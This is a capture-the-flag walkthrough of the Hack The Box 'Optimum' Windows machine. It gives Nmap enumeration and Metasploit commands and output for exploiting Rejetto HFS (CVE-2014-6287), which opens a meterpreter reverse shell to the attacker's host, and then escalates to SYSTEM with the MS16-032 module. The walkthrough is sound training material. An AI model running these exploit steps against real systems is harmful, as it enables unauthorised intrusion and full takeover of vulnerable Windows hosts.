___ ___ _________ ________
|\ \|\ \|\___ ___\\ __ \ ___
\ \ \\\ \|___ \ \_\ \ \|\ /_|\__\
\ \ __ \ \ \ \ \ \ __ \|__|
\ \ \ \ \ \ \ \ \ \ \|\ \ ___
\ \__\ \__\ \ \__\ \ \_______\|\__\
\|__|\|__| \|__| \|_______|\|__|
________ ________ _________ ___
|\ __ \|\ __ \|\___ ___\\ \
\ \ \|\ \ \ \|\ \|___ \ \_\ \ \ ____________
\ \ \\\ \ \ ____\ \ \ \ \ \ \|\____________\
\ \ \\\ \ \ \___| \ \ \ \ \ \|____________|
\ \_______\ \__\ \ \__\ \ \__\
\|_______|\|__| \|__| \|__|
_____ ______ ___ ___ _____ ______
|\ _ \ _ \|\ \|\ \|\ _ \ _ \
\ \ \\\__\ \ \ \ \\\ \ \ \\\__\ \ \
\ \ \\|__| \ \ \ \\\ \ \ \\|__| \ \
\ \ \ \ \ \ \ \\\ \ \ \ \ \ \
\ \__\ \ \__\ \_______\ \__\ \ \__\
\|__| \|__|\|_______|\|__| \|__|Hack The Box's Optimum is an Easy, beginner-friendly Windows machine with a remote command execution vulnerability (CVE-2014-6287). This machine uses basic enumeration using Nmap, easy to obtain exploits that are available as Metasploit modules, and some basic privilege escalation.
Once starting the machine on HTB and connecting to your HTB VPN, we will start by opening our terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.
ping 10.129.145.193You should receive responses from
the IP address. You can press CTRL + C to stop sending packets to the
target host. Once confirming the network is up and running, it's time to
move to enumeration using Nmap.
Start by doing a quick service
scan using Nmap. We will use the -sV switch to enable version detection.
You can learn more about Nmap here.
nmap -sV 10.129.145.193 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-14 17:58 CDT Nmap scan report for 10.129.145.193 Host is up (0.082s latency). Not shown: 999 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http HttpFileServer httpd 2.3 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.66 seconds
Nmap reveals just one open service, which is HttpFileServer version 2.3. A bit of searching on the web reveals that this particular version has a remote command execution vulnerability (CVE-2014-6287). Let's fire-up Metasploit and search for potential exploits:
msfconsole Metasploit tip: Network adapter names can be used for IP options set LHOST eth0 `:oDFo:` ./ymM0dayMmy/. -+dHJ5aGFyZGVyIQ==+- `:sm⏣~~Destroy.No.Data~~s:` -+h2~~Maintain.No.Persistence~~h+- `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:` ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/. -++SecKCoin++e.AMd` `.-://///+hbove.913.ElsMNh+- -~/.ssh/id_rsa.Des- `htN01UserWroteMe!- :dopeAW.No<nano>o :is:TЯiKC.sudo-.A: :we're.all.alike'` The.PFYroy.No.D7: :PLACEDRINKHERE!: yxp_cmdshell.Ab0: :msf>exploit -j. :Ns.BOB&ALICEes7: :---srwxrwx:-.` `MS146.52.No.Per: :<script>.Ac816/ sENbove3101.404: :NT_AUTHORITY.Do `T:/shSYSTEM-.N: :09.14.2011.raid /STFU|wall.No.Pr: :hevnsntSurb025N. dNVRGOING2GIVUUP: :#OUTHOUSE- -s: /corykennedyData: :$nmap -oS SSo.6178306Ence: :Awsm.da: /shMTl#beats3o.No.: :Ring0: `dDestRoyREXKC3ta/M: :23d: sSETEC.ASTRONOMYist: /- /yo- .ence.N:(){ :|: & };: `:Shall.We.Play.A.Game?tron/ ```-ooy.if1ghtf0r+ehUser5` ..th3.H1V3.U2VjRFNN.jMh+.` `MjM~~WE.ARE.se~~MMjMs +~KANSAS.CITY's~-` J~HAKCERS~./.` .esc:wq!:` +++ATH` ` =[ metasploit v6.4.43-dev ] + -- --=[ 2484 exploits - 1279 auxiliary - 431 post ] + -- --=[ 1466 payloads - 49 encoders - 13 nops ] + -- --=[ 9 evasion ] Metasploit Documentation: https://docs.metasploit.com/ [msf](Jobs:0 Agents:0) >> search CVE-2014-6287 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec [msf](Jobs:0 Agents:0) >>
We see option #0 shows a module for a remote command execution. You can read more about this specific exploit on Rapid7's website here. Let's select this attack and fill out the required exploit options:
[msf](Jobs:0 Agents:0) >> use 0 [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp [msf](Jobs:0 Agents:0) exploit(windows/http/rejetto_hfs_exec) >> options Module options (exploit/windows/http/rejetto_hfs_exec): Name Current Setting Required Description ---- --------------- -------- ----------- HTTPDELAY 10 no Seconds to wait before terminating web server Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-meta sploit.html RPORT 80 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local mach ine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI / yes The path of the web application URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 209.151.153.12 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic View the full module info with the info, or info -d command. [msf](Jobs:0 Agents:0) exploit(windows/http/rejetto_hfs_exec) >> set RHOSTS 10.129.145.193 RHOSTS => 10.129.145.193 [msf](Jobs:0 Agents:0) exploit(windows/http/rejetto_hfs_exec) >> set LHOST 10.10.14.241 LHOST => 10.10.14.241 [msf](Jobs:0 Agents:0) exploit(windows/http/rejetto_hfs_exec) >>
We set the RHOSTS to the target ip address and the LHOST to our desired listening ip address for the reverse TCP connection. We can now run this exploit:
[msf](Jobs:0 Agents:0) exploit(windows/http/rejetto_hfs_exec) >> exploit [*] Started reverse TCP handler on 10.10.14.241:4444 [*] Using URL: http://10.10.14.241:8080/AC4Xw9vZoq [*] Server started. [*] Sending a malicious request to / [*] Payload request received: /AC4Xw9vZoq [*] Sending stage (177734 bytes) to 10.129.145.193 [!] Tried to delete %TEMP%\EnMMptsidRA.vbs, unknown result [*] Meterpreter session 1 opened (10.10.14.241:4444 -> 10.129.145.193:49162) at 2025-07-14 18:21:30 -0500 [*] Server stopped. (Meterpreter 1)(C:\Users\kostas\Desktop) >
We get a shell for the user, kostas. We can now search the machine for the user .txt flag. But what about our root flag? We will need to do some privilege escalation using Metasploit. Let's background this session using the background command and search for an exploit for our target system:
(Meterpreter 1)(C:\Documents and Settings\kostas\Desktop) > background [*] Backgrounding session 1... [msf](Jobs:0 Agents:1) exploit(windows/http/rejetto_hfs_exec) >> search exploit/windows/local Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/local/adobe_sandbox_adobecollabsync 2013-05-14 great Yes AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass 1 exploit/windows/local/agnitum_outpost_acs 2013-08-02 excellent Yes Agnitum Outpost Internet Security Local Privilege Escalation 2 exploit/windows/local/cve_2023_21768_afd_lpe 2023-01-10 excellent Yes Ancillary Function Driver (AFD) for WinSock Elevation of Privilege 3 exploit/windows/local/applocker_bypass 2015-08-03 excellent No AppLocker Execution Prevention Bypass 4 exploit/windows/local/appxsvc_hard_link_privesc 2019-04-09 normal Yes AppXSvc Hard Link Privilege Escalation 5 exploit/windows/local/ps_wmi_exec 2012-08-19 excellent No Authenticated WMI Exec via Powershell 6 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move 2020-03-10 excellent Yes Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability 7 exploit/windows/local/cve_2020_17136 2020-03-10 normal Yes CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP 8 exploit/windows/local/cve_2022_21999_spoolfool_privesc 2022-02-08 normal Yes CVE-2022-21999 SpoolFool Privesc 9 exploit/windows/local/canon_driver_privesc 2021-08-07 normal Yes Canon Driver Privilege Escalation 10 exploit/windows/local/anyconnect_lpe 2020-08-05 excellent Yes Cisco AnyConnect Privilege Escalations (CVE-2020-3153 and CVE-2020-3433) 11 exploit/windows/local/cve_2021_21551_dbutil_memmove 2021-05-04 good Yes Dell DBUtil_2_3.sys IOCTL memmove 12 exploit/windows/local/dnsadmin_serverlevelplugindll 2017-05-08 normal Yes DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation 13 exploit/windows/local/docker_credential_wincred 2019-07-05 manual Yes Docker-Credential-Wincred.exe Privilege Escalation 14 exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc 2020-02-25 excellent Yes Druva inSync inSyncCPHwnet64.exe RPC Type 5 Privilege Escalation 15 exploit/windows/local/gog_galaxyclientservice_privesc 2020-04-28 excellent Yes GOG GalaxyClientService Privilege Escalation 16 exploit/windows/local/ikeext_service 2012-10-09 good Yes IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL 17 \_ target: Windows x86 . . . . 18 \_ target: Windows x64 . . . . 19 exploit/windows/local/cve_2017_8464_lnk_lpe 2017-06-13 great Yes LNK Code Execution Vulnerability 20 \_ target: Windows x64 . . . . 21 \_ target: Windows x86 . . . . 22 exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver 2022-11-09 good Yes Lenovo Diagnostics Driver IOCTL memmove 23 exploit/windows/local/lenovo_systemupdate 2015-04-12 excellent Yes Lenovo System Update Privilege Escalation 24 exploit/windows/local/lexmark_driver_privesc 2021-07-15 normal Yes Lexmark Driver Privilege Escalation 25 exploit/windows/local/mqac_write 2014-07-22 average Yes MQAC.sys Arbitrary Write Privilege Escalation 26 exploit/windows/local/ms11_080_afdjoinleaf 2011-11-30 average No MS11-080 AfdJoinLeaf Privilege Escalation 27 \_ target: Automatic . . . . 28 \_ target: Windows XP SP2 / SP3 . . . . 29 \_ target: Windows Server 2003 SP2 . . . . 30 exploit/windows/local/ms13_005_hwnd_broadcast 2012-11-27 excellent No MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation 31 \_ target: Windows x86 . . . . 32 \_ target: Windows x64 . . . . 33 exploit/windows/local/ms13_097_ie_registry_symlink 2013-12-10 great No MS13-097 Registry Symlink IE Sandbox Escape 34 exploit/windows/local/ms_ndproxy 2013-11-27 average Yes MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation 35 \_ target: Automatic . . . . 36 \_ target: Windows XP SP3 . . . . 37 \_ target: Windows Server 2003 SP2 . . . . 38 exploit/windows/local/ms14_009_ie_dfsvc 2014-02-11 great Yes MS14-009 .NET Deployment Service IE Sandbox Escape 39 exploit/windows/local/bthpan 2014-07-18 average Yes MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation 40 exploit/windows/local/ms14_070_tcpip_ioctl 2014-11-11 average Yes MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference 41 exploit/windows/local/ntapphelpcachecontrol 2014-09-30 normal Yes MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check 42 exploit/windows/local/ms15_004_tswbproxy 2015-01-13 good Yes MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape 43 exploit/windows/local/ms15_078_atmfd_bof 2015-07-11 manual Yes MS15-078 Microsoft Windows Font Driver Buffer Overflow 44 exploit/windows/local/ms16_016_webdav 2016-02-09 excellent Yes MS16-016 mrxdav.sys WebDav Local Privilege Escalation 45 exploit/windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation 46 \_ target: Windows x86 . . . . 47 \_ target: Windows x64 . . . . 48 exploit/windows/local/microfocus_operations_privesc 2020-10-28 excellent No Micro Focus Operations Bridge Manager / Reporter Local Privilege Escalation 49 \_ target: Micro Focus Operations Bridge Manager (Windows) <= 2020.05 . . . . 50 \_ target: Micro Focus Operations Bridge Reporter (Windows) <= 10.40 . . . . 51 exploit/windows/local/win_error_cve_2023_36874 2023-07-11 excellent Yes Microsoft Error Reporting Local Privilege Elevation Vulnerability 52 exploit/windows/local/cve_2020_1048_printerdemon 2019-11-04 normal Yes Microsoft Spooler Local Privilege Elevation Vulnerability 53 exploit/windows/local/cve_2020_1337_printerdemon 2019-11-04 excellent Yes Microsoft Spooler Local Privilege Elevation Vulnerability 54 exploit/windows/local/comahawk 2019-11-12 excellent No Microsoft UPnP Local Privilege Elevation Vulnerability 55 exploit/windows/local/alpc_taskscheduler 2018-08-27 normal No Microsoft Windows ALPC Task Scheduler Local Privilege Elevation 56 exploit/windows/local/cve_2020_1054_drawiconex_lpe 2020-02-20 normal Yes Microsoft Windows DrawIconEx OOB Write Local Privilege Elevation 57 exploit/windows/local/ntusermndragover 2019-03-12 normal Yes Microsoft Windows NtUserMNDragOver Local Privilege Elevation 58 exploit/windows/local/mov_ss 2018-05-08 excellent No Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability 59 exploit/windows/local/cve_2019_1458_wizardopium 2019-12-10 normal Yes Microsoft Windows Uninitialized Variable Local Privilege Elevation 60 exploit/windows/local/nscp_pe 2020-10-20 excellent Yes NSClient++ 0.5.2.35 - Privilege escalation 61 exploit/windows/local/novell_client_nicm 2013-05-22 average Yes Novell Client 2 SP3 nicm.sys Local Privilege Escalation 62 \_ target: Automatic . . . . 63 \_ target: Windows 7 SP1 . . . . 64 exploit/windows/local/novell_client_nwfs 2008-06-26 average No Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation 65 \_ target: Automatic . . . . 66 \_ target: Windows XP SP3 . . . . 67 exploit/windows/local/nvidia_nvsvc 2012-12-25 average Yes Nvidia (nvsvc) Display Driver Service Local Privilege Escalation 68 exploit/windows/local/pxeexploit 2011-08-05 excellent No PXE Exploit Server 69 exploit/windows/local/panda_psevents 2016-06-27 excellent Yes Panda Security PSEvents Privilege Escalation 70 \_ target: Windows x86 . . . . 71 \_ target: Windows x64 . . . . 72 exploit/windows/local/vss_persistence 2011-10-21 excellent No Persistent Payload in Windows Volume Shadow Copy 73 exploit/windows/local/plantronics_hub_spokesupdateservice_privesc 2019-08-30 excellent Yes Plantronics Hub SpokesUpdateService Privilege Escalation 74 exploit/windows/local/ps_persist 2012-08-14 excellent No Powershell Payload Execution 75 exploit/windows/local/powershell_remoting 1999-01-01 excellent No Powershell Remoting Remote Command Execution 76 exploit/windows/local/current_user_psexec 1999-01-01 excellent No PsExec via Current User Token 77 exploit/windows/local/razer_zwopenprocess 2017-03-22 normal Yes Razer Synapse rzpnk.sys ZwOpenProcess 78 exploit/windows/local/ricoh_driver_privesc 2020-01-22 normal Yes Ricoh Driver Privilege Escalation 79 exploit/windows/local/cve_2020_0796_smbghost 2020-03-13 good Yes SMBv3 Compression Buffer Overflow 80 \_ AKA: SMBGhost . . . . 81 \_ AKA: CoronaBlue . . . . 82 exploit/windows/local/bits_ntlm_token_impersonation 2019-12-06 great Yes SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service. 83 exploit/windows/local/cve_2020_0668_service_tracing 2020-02-11 excellent No Service Tracing Privilege Elevation Vulnerability 84 exploit/windows/local/cve_2022_26904_superprofile 2022-03-17 excellent Yes User Profile Arbitrary Junction Creation Local Privilege Elevation 85 exploit/windows/local/virtual_box_opengl_escape 2014-03-11 average Yes VirtualBox 3D Acceleration Virtual Machine Escape 86 exploit/windows/local/virtual_box_guest_additions 2014-07-15 average Yes VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation 87 exploit/windows/local/wmi_persistence 2017-06-06 normal No WMI Event Subscription Persistence 88 exploit/windows/local/webexec 2018-10-09 good Yes WebEx Local Service Permissions Exploit 89 \_ target: Automatic . . . . 90 \_ target: Windows x86 . . . . 91 \_ target: Windows x64 . . . . 92 exploit/windows/local/cve_2022_21882_win32k 2021-02-09 average Yes Win32k ConsoleControl Offset Confusion 93 exploit/windows/local/cve_2021_40449 2021-10-12 good Yes Win32k NtGdiResetDC Use After Free Local Privilege Elevation 94 exploit/windows/local/bypassuac_windows_store_filesys 2019-08-22 manual Yes Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) 95 exploit/windows/local/bypassuac_windows_store_reg 2019-02-19 manual Yes Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry 96 exploit/windows/local/cve_2024_35250_ks_driver 2024-06-11 excellent Yes Windows Access Mode Mismatch LPE in ks.sys 97 exploit/windows/local/always_install_elevated 2010-03-18 excellent Yes Windows AlwaysInstallElevated MSI 98 exploit/windows/local/capcom_sys_exec 1999-01-01 normal Yes Windows Capcom.sys Kernel Execution Exploit (x64 only) 99 exploit/windows/local/ms15_051_client_copy_image 2015-05-12 normal Yes Windows ClientCopyImage Win32k Exploit 100 \_ target: Windows x86 . . . . 101 \_ target: Windows x64 . . . . 102 exploit/windows/local/powershell_cmd_upgrade 1999-01-01 excellent No Windows Command Shell Upgrade (Powershell) 103 exploit/windows/local/cve_2023_28252_clfs_driver 2023-04-11 good Yes Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability 104 exploit/windows/local/ppr_flatten_rec 2013-05-15 average Yes Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation 105 exploit/windows/local/service_permissions 2012-10-15 great No Windows Escalate Service Permissions Local Privilege Escalation 106 exploit/windows/local/ms10_092_schelevator 2010-09-13 excellent Yes Windows Escalate Task Scheduler XML Privilege Escalation 107 \_ target: Windows Vista / 7 / 2008 (Dropper) . . . . 108 \_ target: Windows Vista / 7 / 2008 (Command) . . . . 109 exploit/windows/local/ask 2012-01-03 excellent No Windows Escalate UAC Execute RunAs 110 exploit/windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass 111 \_ target: Windows x86 . . . . 112 \_ target: Windows x64 . . . . 113 exploit/windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) 114 \_ target: Windows x86 . . . . 115 \_ target: Windows x64 . . . . 116 exploit/windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS 117 \_ target: Windows x86 . . . . 118 \_ target: Windows x64 . . . . 119 exploit/windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability) 120 exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack) 121 exploit/windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key) 122 \_ target: Windows x86 . . . . 123 \_ target: Windows x64 . . . . 124 exploit/windows/local/bypassuac_sdclt 2017-03-17 excellent Yes Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key) 125 exploit/windows/local/bypassuac_silentcleanup 2019-02-24 excellent No Windows Escalate UAC Protection Bypass (Via SilentCleanup) 126 exploit/windows/local/bypassuac_dotnet_profiler 2017-03-17 excellent Yes Windows Escalate UAC Protection Bypass (Via dot net profiler) 127 exploit/windows/local/cve_2024_30088_authz_basep 2024-06-11 excellent Yes Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes 128 exploit/windows/local/payload_inject 2011-10-12 excellent No Windows Manage Memory Payload Injection 129 exploit/windows/local/s4u_persistence 2013-01-02 excellent No Windows Manage User Level Persistent Payload Installer 130 exploit/windows/local/wmi 1999-01-01 excellent No Windows Management Instrumentation (WMI) Remote Command Execution 131 exploit/windows/local/ms13_053_schlamperei 2013-12-01 average Yes Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei) 132 exploit/windows/local/ms16_075_reflection 2016-01-16 normal Yes Windows Net-NTLMv2 Reflection DCOM/RPC 133 \_ target: Automatic . . . . 134 \_ target: Windows x86 . . . . 135 \_ target: Windows x64 . . . . 136 exploit/windows/local/ms16_075_reflection_juicy 2016-01-16 great Yes Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy) 137 exploit/windows/local/cve_2018_8453_win32k_priv_esc 2018-10-09 manual No Windows NtUserSetWindowFNID Win32k User Callback 138 exploit/windows/local/persistence 2011-10-19 excellent No Windows Persistent Registry Startup Payload Installer 139 exploit/windows/local/persistence_service 2018-10-20 excellent No Windows Persistent Service Installer 140 exploit/windows/local/tokenmagic 2017-05-25 excellent Yes Windows Privilege Escalation via TokenMagic (UAC Bypass) 141 exploit/windows/local/registry_persistence 2015-07-01 excellent Yes Windows Registry Only Persistence 142 exploit/windows/local/run_as 1999-01-01 excellent No Windows Run Command As User 143 exploit/windows/local/ms10_015_kitrap0d 2010-01-19 great Yes Windows SYSTEM Escalation via KiTrap0D 144 exploit/windows/local/srclient_dll_hijacking 2021-02-19 normal Yes Windows Server 2012 SrClient DLL hijacking 145 exploit/windows/local/ms18_8120_win32k_privesc 2018-05-09 good No Windows SetImeInfoEx Win32k NULL Pointer Dereference 146 \_ target: Automatic . . . . 147 \_ target: Windows 7 x64 . . . . 148 \_ target: Windows 7 x86 . . . . 149 exploit/windows/local/persistence_image_exec_options 2008-06-28 excellent No Windows Silent Process Exit Persistence 150 exploit/windows/local/ms14_058_track_popup_menu 2014-10-14 normal Yes Windows TrackPopupMenu Win32k NULL Pointer Dereference 151 \_ target: Windows x86 . . . . 152 \_ target: Windows x64 . . . . 153 exploit/windows/local/ms13_081_track_popup_menu 2013-10-08 average Yes Windows TrackPopupMenuEx Win32k NULL Page 154 exploit/windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key) 155 \_ target: Windows x86 . . . . 156 \_ target: Windows x64 . . . . 157 exploit/windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack) 158 \_ target: Windows x86 . . . . 159 \_ target: Windows x64 . . . . 160 exploit/windows/local/unquoted_service_path 2001-10-25 great Yes Windows Unquoted Service Path Privilege Escalation 161 exploit/windows/local/cve_2020_1313_system_orchestrator 2019-11-04 excellent Yes Windows Update Orchestrator unchecked ScheduleWork call 162 exploit/windows/local/ms16_014_wmi_recv_notif 2015-12-04 normal Yes Windows WMI Receive Notification Exploit 163 exploit/windows/local/windscribe_windscribeservice_priv_esc 2018-05-24 excellent Yes Windscribe WindscribeService Named Pipe Privilege Escalation 164 exploit/windows/local/ipass_launch_app 2015-03-12 excellent Yes iPass Mobile Client Service Privilege Escalation Interact with a module by name or index. For example info 164, use 164 or use exploit/windows/local/ipass_launch_app [msf](Jobs:0 Agents:1) exploit(windows/http/rejetto_hfs_exec) >>
We receive a fairly large list of results from our search. After testing and searching through the list of privilege escalation options we find one labeled MS16-032 Secondary Logon Handle Privilege Escalation. We can use option 47 as our target machine uses x64 architecture. After filling our options for the exploit, let's give it a try:
[msf](Jobs:0 Agents:1) exploit(windows/local/ms16_032_secondary_logon_handle_privesc) >> exploit [*] Started reverse TCP handler on 10.10.14.241:4444 [+] Compressed size: 1160 [*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\SOMHVxRLiljsx.ps1... [*] Compressing script contents... [+] Compressed size: 3737 [*] Executing exploit script... __ __ ___ ___ ___ ___ ___ ___ | V | _|_ | | _|___| |_ |_ | | |_ |_| |_| . |___| | |_ | _| |_|_|_|___|_____|___| |___|___|___| [by b33f -> @FuzzySec] [?] Operating system core count: 2 [>] Duplicating CreateProcessWithLogonW handle [?] Done, using thread handle: 1844 [*] Sniffing out privileged impersonation token.. [?] Thread belongs to: svchost [+] Thread suspended [>] Wiping current impersonation token [>] Building SYSTEM impersonation token [ref] cannot be applied to a variable that does not exist. At line:200 char:3 + $apCb = [Ntdll]::NtImpersonateThread($hPZ, $hPZ, [ref]$lMyt) + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (lMyt:VariablePath) [], Runtim eException + FullyQualifiedErrorId : NonExistingVariableReference [!] NtImpersonateThread failed, exiting.. [+] Thread resumed! [*] Sniffing out SYSTEM shell.. [>] Duplicating SYSTEM token Cannot convert argument "ExistingTokenHandle", with value: "", for "DuplicateTo ken" to type "System.IntPtr": "Cannot convert null to type "System.IntPtr"." At line:259 char:2 + $apCb = [Advapi32]::DuplicateToken($tR, 2, [ref]$yYvW) + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodException + FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument [>] Starting token race [>] Starting process race [!] Holy handle leak Batman, we have a SYSTEM shell!! r3DS97QrRD9gWYe3NeRgiWVTzF1m4UtB [+] Executed on target machine. [*] Sending stage (203846 bytes) to 10.129.145.193 [*] Meterpreter session 2 opened (10.10.14.241:4444 -> 10.129.145.193:49163) at 2025-07-14 18:38:40 -0500 [+] Deleted C:\Users\kostas\AppData\Local\Temp\SOMHVxRLiljsx.ps1 (Meterpreter 2)(C:\Documents and Settings\kostas\Desktop) >
We get another shell. We can run the getuid command to receive the following results, confirming the privelege escalation has worked!
(Meterpreter 2)(C:\Documents and Settings\kostas\Desktop) > getuid Server username: NT AUTHORITY\SYSTEM
You can now navigate through the target system as an administrator to obtain the root .txt flag.
No comments:
Post a Comment